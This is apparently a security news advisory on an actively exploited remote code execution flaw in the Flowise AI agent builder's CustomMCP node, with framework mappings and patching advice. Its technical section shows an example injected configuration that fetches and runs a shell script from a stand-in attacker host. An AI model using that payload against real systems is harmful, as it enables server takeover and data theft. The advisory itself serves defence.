LIVE THREATS
MEDIUM AI Bills of Materials Emerge as Critical Tool for ML Supply Chain Risk // HIGH Anthropic's Claude Mythos Autonomously Uncovers 10,000 Critical Software Flaws // HIGH LLM Coding Agents Collapse Under Structural Constraints, Study Finds // MEDIUM SentinelOne Prompt Security Targets Agentic AI Trust Verification Gap // MEDIUM Google's Gemini Spark Agent Raises Prompt Injection Risks at Enterprise Scale // MEDIUM AI Agent Identity Sprawl Creates New Attack Surface in Enterprise IAM // MEDIUM AI Security Lacks Reliable Measurement: Why Benchmarks Alone Are Insufficient // HIGH Anthropic's Mythos AI Model Used to Find Exploitable macOS Kernel Vulnerability // MEDIUM Microsoft Open-Sources RAMPART and Clarity to Harden AI Agent Security // MEDIUM LLM Activation Steering Goes Local: Security Implications of Direct Model Manipulation //
ATLAS OWASP CRITICAL Active exploitation · Immediate action required Agentic AI LLM Security Supply Chain Industry News RELEVANCE ▲ 9.4

Flowise AI Agent Builder Under Active CVSS 10.0 RCE Exploitation; 12,000+ Instances Exposed

SOURCE The Hacker News ↗
TL;DR CRITICAL
  • What happened: Flowise AI agent builder suffers maximum-severity RCE via unsanitized JavaScript execution in CustomMCP node.
  • Who's at risk: Organizations running internet-exposed Flowise instances (12,000+) for AI workflow automation without authentication controls.
  • Act now: Immediately patch Flowise to latest version patching CVE-2025-59528. · Restrict network access to Flowise instances; require strong authentication and API tokens. · Audit MCP server configurations for suspicious command injections or remote payloads.
Flowise AI Agent Builder Under Active CVSS 10.0 RCE Exploitation; 12,000+ Instances Exposed

Overview

A critical remote code execution (RCE) vulnerability in Flowise — a popular open-source platform for building AI agents and LLM workflows — is being actively exploited in the wild. CVE-2025-59528 carries a maximum CVSS score of 10.0 and affects the platform’s CustomMCP node, which handles configuration for Model Context Protocol (MCP) server connections. With more than 12,000 internet-facing Flowise instances exposed, the attack surface is substantial. This is the third Flowise vulnerability to be exploited in the wild, following CVE-2025-8943 (CVSS 9.8) and CVE-2025-26319 (CVSS 8.9).

Technical Analysis

The vulnerability resides in the CustomMCP node’s handling of the mcpServerConfig input string. Flowise parses this user-supplied configuration to build the MCP server connection parameters. Critically, during this parsing process, the platform executes embedded JavaScript code without any security validation or sandboxing.

Because Flowise operates with full Node.js runtime privileges, a malicious actor can inject arbitrary JavaScript referencing dangerous built-in modules:

// Example of malicious mcpServerConfig payload
{
  "command": "node",
  "args": ["-e", "require('child_process').exec('curl http://attacker.com/shell.sh | bash')"]
}

This grants attackers access to child_process (arbitrary OS command execution) and fs (full file system read/write). Exploitation requires only a valid API token, lowering the barrier considerably. VulnCheck has attributed current exploitation activity to a single Starlink IP address, suggesting opportunistic scanning and exploitation at scale.

Framework Mapping

MITRE ATLAS:

  • AML.T0047 – ML-Enabled Product or Service: Flowise is a production AI orchestration platform; compromise affects downstream AI pipelines and agent behaviour.
  • AML.T0040 – ML Model Inference API Access: Attacker gains server-level access through the AI platform’s API surface.
  • AML.T0010 – ML Supply Chain Compromise: Unpatched Flowise instances embedded in enterprise AI stacks represent a supply chain risk vector.

OWASP LLM Top 10:

  • LLM07 – Insecure Plugin Design: The CustomMCP node acts as a plugin/tool with no input sanitisation or code execution controls.
  • LLM08 – Excessive Agency: The platform executes code with full system privileges, far exceeding necessary operational scope.
  • LLM05 – Supply Chain Vulnerabilities: Third-party AI infrastructure components with unpatched critical flaws introduce systemic risk.
  • LLM06 – Sensitive Information Disclosure: Successful exploitation enables exfiltration of credentials, model configurations, and customer data.

Impact Assessment

The 12,000+ exposed instances represent a broad attack surface spanning enterprises, startups, and research institutions using Flowise for production AI agent workflows. A successful exploit yields full server compromise, enabling lateral movement, data exfiltration, ransomware deployment, or persistent backdoor installation. The vulnerability has been public for over six months since the September 2025 advisory, meaning any unpatched instance has had prolonged exposure. Large corporations using Flowise as part of their AI infrastructure face significant business continuity and data protection risks.

Mitigation & Recommendations

  1. Patch immediately: Upgrade to Flowise npm package version 3.0.6 or later, which addresses CVE-2025-59528.
  2. Restrict internet exposure: Remove Flowise instances from public internet access; place behind VPN or zero-trust network access controls.
  3. Audit API token usage: Rotate all API tokens and review access logs for anomalous activity originating from unknown IP addresses.
  4. Monitor for indicators: Watch for unexpected outbound connections, unusual child_process activity, or file system modifications on Flowise host systems.
  5. Inventory AI infrastructure: Conduct a full audit of AI orchestration tools (Flowise, LangChain, etc.) across the stack to identify additional exposure.
  6. Apply defence-in-depth: Sandbox or containerise AI agent platforms with least-privilege OS configurations to limit blast radius from future exploits.

References

◉ AI THREAT BRIEFING

Stay ahead of the threat.

Twice-weekly digest of critical AI security developments — every story mapped to MITRE ATLAS and OWASP LLM Top 10. Free.

No spam. Unsubscribe anytime.